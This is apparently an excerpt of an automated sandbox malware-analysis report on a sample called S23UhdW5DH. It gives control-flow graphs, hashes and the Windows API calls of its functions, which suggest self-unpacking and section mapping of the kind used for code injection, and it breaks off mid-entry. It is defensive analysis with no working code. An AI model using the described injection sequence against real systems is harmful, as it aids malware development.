                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 350 401729 351 40172b 350->351 352 40172f-40174d 350->352 351->352 353 40172d 351->353 365 401764 352->365 366 401755-401778 352->366 353->352 355 4016be-4016cb NtCreateSection 353->355 357 4016d1-4016d5 355->357 358 4018dd-40193b call 4011cd 355->358 357->358 361 4016db-4016fc NtMapViewOfSection 357->361 361->358 364 401702-40171e NtMapViewOfSection 361->364 364->358 368 401724 364->368 365->366 375 40177b-4017b8 366->375 368->358 371 401724 call 401729 368->371 371->358 392 4017ba-4017e3 375->392 397 4017e5-4017eb 392->397 398 4017ed 392->398 399 4017f3-4017f9 397->399 398->399 400 401809-40180d 399->400 401 4017fb-401807 399->401 400->399 402 40180f-401814 400->402 401->400 403 401816 call 40181b 402->403 404 40187c-40188b 402->404 406 40188e-401891 404->406 407 401893-40189d 406->407 408 4018bb-4018d4 406->408 409 4018a0-4018a9 407->409 408->358 410 4018b7 409->410 411 4018ab-4018b5 409->411 410->409 412 4018b9 410->412 411->410 412->406
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 33071139-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b6b7661ceeaa473891237c732f5305db374e8f07cd43916073c5c2763a81e662
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bb29a515743844fa426f6922f48e3936f90c9c278b9ffb8c9c9d974ad6050a99
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6b7661ceeaa473891237c732f5305db374e8f07cd43916073c5c2763a81e662
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69519272904104EBEB249A55CC44FAA77B5FF85700F24813BE842772F0D67C6942E65B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 005DF950 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 413 5df950-5df969 414 5df96b-5df96d 413->414 415 5df96f 414->415 416 5df974-5df980 CreateToolhelp32Snapshot 414->416 415->416 417 5df990-5df99d Module32First 416->417 418 5df982-5df988 416->418 419 5df99f-5df9a0 call 5df60f 417->419 420 5df9a6-5df9ae 417->420 418->417 423 5df98a-5df98e 418->423 424 5df9a5 419->424 423->414 423->417 424->420
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005DF978
                                                                                                                                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 005DF998
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2136667464.00000000005D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 005D8000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5d8000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9c38444bb6a0e2d185df4720541e78dcb26f73e8a10d616af013cab6bc25c0be
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4F0C235900711BFD7302BBD988CB6E7AE8BF48324F10113BE643911C0DA70E8454761
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0055003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 0 55003c-550047 1 55004c-550263 call 550a3f call 550e0f call 550d90 VirtualAlloc 0->1 2 550049 0->2 17 550265-550289 call 550a69 1->17 18 55028b-550292 1->18 2->1 23 5502ce-5503c2 VirtualProtect call 550cce call 550ce7 17->23 20 5502a1-5502b0 18->20 22 5502b2-5502cc 20->22 20->23 22->20 29 5503d1-5503e0 23->29 30 5503e2-550437 call 550ce7 29->30 31 550439-5504b8 VirtualFree 29->31 30->29 33 5505f4-5505fe 31->33 34 5504be-5504cd 31->34 35 550604-55060d 33->35 36 55077f-550789 33->36 38 5504d3-5504dd 34->38 35->36 39 550613-550637 35->39 42 5507a6-5507b0 36->42 43 55078b-5507a3 36->43 38->33 41 5504e3-550505 38->41 46 55063e-550648 39->46 50 550517-550520 41->50 51 550507-550515 41->51 44 5507b6-5507cb 42->44 45 55086e-5508be LoadLibraryA 42->45 43->42 47 5507d2-5507d5 44->47 55 5508c7-5508f9 45->55 46->36 48 55064e-55065a 46->48 52 550824-550833 47->52 53 5507d7-5507e0 47->53 48->36 54 550660-55066a 48->54 56 550526-550547 50->56 51->56 60 550839-55083c 52->60 57 5507e4-550822 53->57 58 5507e2 53->58 59 55067a-550689 54->59 61 550902-55091d 55->61 62 5508fb-550901 55->62 63 55054d-550550 56->63 57->47 58->52 64 550750-55077a 59->64 65 55068f-5506b2 59->65 60->45 66 55083e-550847 60->66 62->61 68 550556-55056b 63->68 69 5505e0-5505ef 63->69 64->46 70 5506b4-5506ed 65->70 71 5506ef-5506fc 65->71 72 550849 66->72 73 55084b-55086c 66->73 74 55056d 68->74 75 55056f-55057a 68->75 69->38 70->71 76 5506fe-550748 71->76 77 55074b 71->77 72->45 73->60 74->69 78 55057c-550599 75->78 79 55059b-5505bb 75->79 76->77 77->59 84 5505bd-5505db 78->84 79->84 84->63
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0055024D
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135693322.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_550000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 45bb27c3125b16f6db0b06f06b814a4eb305919380205288ee8db3488fa42a7c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39526C74A00229DFDB64CF58C995BA8BBB1BF09305F1480DAE94DA7351DB30AE89DF14
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00550E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 426 550e0f-550e24 SetErrorMode * 2 427 550e26 426->427 428 550e2b-550e2c 426->428 427->428
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,00550223,?,?), ref: 00550E19
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,00550223,?,?), ref: 00550E1E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135693322.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_550000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 59f4f3660f24c022e483895a9ce12252ed7c3a0652483bba4d3b890b59234470
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8AD0123114512877D7002AD4DC09BCD7F1CDF05B63F108411FB0DD9080C770994046E5
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040193E Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 429 40193e-401947 430 40195e 429->430 431 40194f-40195a 429->431 430->431 432 401961-4019ae call 4011cd Sleep call 401452 430->432 431->432 443 4019b0-4019b8 call 401553 432->443 444 4019bd-401a03 call 4011cd 432->444 443->444
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4db8ba0b08380255fc5aa34ea3e13561f838480f888933e927f1079a64c57490
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A11CEF120C208FBEB006A959D62E7A3268AB40714F304137BA43790F1D57E8923F76B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040194A Relevance: 1.3, APIs: 1, Instructions: 57sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 458 40194a-4019ae call 4011cd Sleep call 401452 471 4019b0-4019b8 call 401553 458->471 472 4019bd-401a03 call 4011cd 458->472 471->472
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0371ecd990254dd767a604aa567081474727263e4e3774a05daf7e54a603023c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A901A1B120C204EBDB009A95DD62E7A3364AB40314F30453BBA437A1F1C67D9913E72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040195C Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 486 40195c-4019ae call 4011cd Sleep call 401452 498 4019b0-4019b8 call 401553 486->498 499 4019bd-401a03 call 4011cd 486->499 498->499
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3b2e7dc224df146109f963d95c0ead7a9e1b698bafe8296883a7ac19869aede1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA0171B5208204EADB006AD5DD71E7A3269AB44314F304537BA43791F1D57D8912F72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401973 Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 513 401973-4019ae call 4011cd Sleep call 401452 524 4019b0-4019b8 call 401553 513->524 525 4019bd-401a03 call 4011cd 513->525 524->525
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4b03b50232763afd30ab0c608f125a1a80ed78bb00471cf4ed55e3bed959d7b6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F80184B5208204EBDB006AD5DD71EBA3269AB44354F304537BA43790F1C57D8912F72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401964 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 539 401964-4019ae call 4011cd Sleep call 401452 549 4019b0-4019b8 call 401553 539->549 550 4019bd-401a03 call 4011cd 539->550 549->550
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e5353c19dd0b10c2d892503bd00f36fba5e3f507ee708bcba0cfbdc82fbef293
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f592bab324d3cd5d6286c78059ef0a1e8702b22de7bd53a4ec4d5e19e7ef6e8c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5353c19dd0b10c2d892503bd00f36fba5e3f507ee708bcba0cfbdc82fbef293
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D0184B5208204EBDB006AC5DD62EBA3265AB44314F204537FA43791F1C57D8912F72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 005DF60F Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005DF660
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2136667464.00000000005D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 005D8000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5d8000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f8531531a7f063935ec646a7490e5cbbc822d468df2d130dd4453c6612037ca0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F112B79A00208EFDB01DF98C989E98BFF5EF08350F0580A5F9489B362D371EA50DB80
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401987 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 74fb996ba95ec06bb2abe22af5600ab9efc13f551b73dbf86f34961914988ff4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 68c2b1bb8267a16b47d2b790190fa602822f098e0b694be4ddc2e306b3be1968
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74fb996ba95ec06bb2abe22af5600ab9efc13f551b73dbf86f34961914988ff4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AF086B5208204FADB006BD59D61EBA3768AB44354F204137BA13790F1C57D8912F72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040197A Relevance: 1.3, APIs: 1, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
